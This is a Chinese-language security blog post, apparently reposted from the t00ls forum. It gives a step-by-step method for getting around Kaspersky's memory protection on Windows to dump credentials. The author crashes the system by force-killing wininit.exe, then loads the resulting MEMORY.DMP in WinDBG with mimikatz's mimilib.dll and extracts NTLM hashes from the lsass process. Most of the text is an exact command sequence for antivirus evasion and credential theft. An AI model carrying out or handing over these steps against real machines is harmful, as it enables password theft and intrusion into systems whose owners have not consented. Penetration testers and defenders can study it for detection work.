通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码

热度:169℃ 评论:0 发布时间:2018-10-27 收录:已收录

在这篇帖子中https://www.t00ls.net/articles-48108.html,@slls124老哥遇见Kaspersky,然后导致无法用procdump,sqldump等工具来dump lsass.exe进程的内存抓密码。kaspersky的确很强,之前在项目中遇见过,由于本人免杀能力不足,只好放弃抓密码,今天正好有空测试:关于通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码

需要的工具:WinDBG+mimilib.dll
测试环境一:win8.1
kaspersky2019(病毒库为2018.10.25号的)
通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码
1、首先我用procdump来dump lsass.exe的内存文件
通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码
2、再用我在https://www.t00ls.net/thread-47663-1-1.html中分享的用sqldump来dump,结局都一样,因为sqldump和procdump的原理都一样
通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码
下面我们就用Windows蓝屏memory.dmp文件来测试
3、获取蓝屏后的dmp文件,使系统蓝屏的方法有很多,比如说强制结束系统进程,我这里选择强制结束系统进程wininit.exe
管理员权限运行cmd后,执行taskkill /f /im "wininit.exe"
通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码
4、取回存在于C:\Windows\文件夹下面的MEMORY.DMP文件
通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码
5、运行windbg,使用Open the crashdump加载MEMORY.DMP
通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码
6、加载mimikatz的mimilib.dll
.load C:\Users\Administrator\Desktop\qqq\mimilib.dll注意load 前面那个点别漏掉
通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码
7、设置微软符号服务器(这一步在测试中可有可无)
.SymFix
8、重新加载
.Reload
9、查看lsass.exe进程的内存地址
!process 0 0 lsass.exe
10、切换到lsass.exe进程中
.process /r /p fffffa800e069b00
通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码
11、运行mimikatz
!mimikatz
通过Windows蓝屏文件来绕过kaspersky的内存保护抓密码
=======================
到此装有kaspersky测试机器win8.1的ntml hash 就成功获得
=======================

打赏
本文由 Mr.Wu 创作,除注明转载/出处外,均为本站原创,转载前请注明出处!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

顶部
护眼
搜索
分享